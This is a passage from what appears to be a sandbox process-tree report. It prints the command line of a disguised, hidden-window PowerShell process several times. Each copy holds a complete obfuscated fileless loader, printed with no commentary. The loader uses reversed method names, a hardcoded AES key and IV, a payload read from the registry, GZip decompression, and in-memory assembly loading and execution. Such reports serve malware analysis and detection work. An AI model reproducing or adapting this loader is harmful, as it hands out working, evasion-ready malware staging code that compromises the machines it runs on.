$lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:2880

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:3380

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:2280

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 